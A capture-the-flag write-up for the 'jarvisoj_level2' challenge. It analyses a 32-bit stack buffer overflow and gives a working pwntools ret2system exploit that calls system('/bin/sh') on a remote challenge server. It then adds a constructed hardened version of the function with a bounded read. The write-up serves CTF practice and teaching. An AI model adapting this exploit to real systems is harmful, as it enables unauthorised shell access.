jarvisoj_level2
First check the binary's protections:

```
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)
```
A 32-bit program with only NX enabled. Decompiling it in IDA:

```c
ssize_t vulnerable_function()
{
    char buf[0x88]; // [esp+0h] [ebp-88h]: 0x88-byte stack buffer
    system("echo Input:");
    return read(0, &buf, 0x100u); // reads up to 0x100 bytes into a 0x88-byte buffer: stack overflow
}
```
The binary also contains the string /bin/sh and imports system(), so after overflowing the buffer we return into system() with /bin/sh as its argument and get a shell.
```python
from pwn import *

# Address of the "/bin/sh" string inside the binary (no PIE, so it is fixed)
bin_sh = 0x804a024
r = remote('node3.buuoj.cn', 27342)
elf = ELF('./jarvisoj_level2')
system_addr = elf.sym['system']  # PLT entry of the imported system()

# 0x88 bytes fill buf, 4 more overwrite the saved ebp, then the fake frame:
# return address -> system(), dummy return address for system(), argument -> "/bin/sh"
payload = b'a' * (0x88 + 4) + p32(system_addr) + p32(0) + p32(bin_sh)
r.sendlineafter(b'Input:', payload)
r.interactive()
```
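For comparison, here is the hardened form of vulnerable_function(), added here as an example and not taken from the writeup or the challenge binary: the read is bounded by the buffer size, so a 0x100-byte input can no longer reach the saved ebp and return address. The names read_bounded, hardened_function and the pipe-based helper demo_oversized_input are constructed for this illustration.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Constructed illustration, not code from the challenge binary.
 * vulnerable_function() calls read(0, &buf, 0x100) on a 0x88-byte stack
 * buffer, so up to 0x78 bytes spill over the saved ebp and return address.
 * Bounding the read by the buffer size removes the overflow entirely. */

#define BUF_SIZE 0x88   /* same buffer size as the decompiled function */

/* Read at most buf_size-1 bytes from fd into buf and NUL-terminate.
 * Returns the number of bytes stored, or -1 on error. */
ssize_t read_bounded(int fd, char *buf, size_t buf_size)
{
    if (buf == NULL || buf_size == 0)
        return -1;
    ssize_t n = read(fd, buf, buf_size - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return n;
}

/* Hardened counterpart of vulnerable_function() (puts() instead of system("echo ...")). */
ssize_t hardened_function(void)
{
    char buf[BUF_SIZE];
    puts("Input:");
    return read_bounded(STDIN_FILENO, buf, sizeof(buf));
}

/* Hypothetical test helper: push input_len bytes of 'A' through a pipe
 * into a BUF_SIZE buffer via read_bounded() and return how many were stored.
 * The original read(..., 0x100) would let the same input overflow. */
ssize_t demo_oversized_input(size_t input_len)
{
    char src[0x100], buf[BUF_SIZE];
    int fds[2];
    if (input_len > sizeof(src) || pipe(fds) != 0)
        return -1;
    memset(src, 'A', input_len);
    ssize_t written = write(fds[1], src, input_len);
    close(fds[1]);
    ssize_t n = written == (ssize_t)input_len ? read_bounded(fds[0], buf, sizeof(buf)) : -1;
    close(fds[0]);
    return n;
}
```

With the full 0x100-byte input, only BUF_SIZE - 1 bytes are stored and the rest stays in the pipe instead of on the stack.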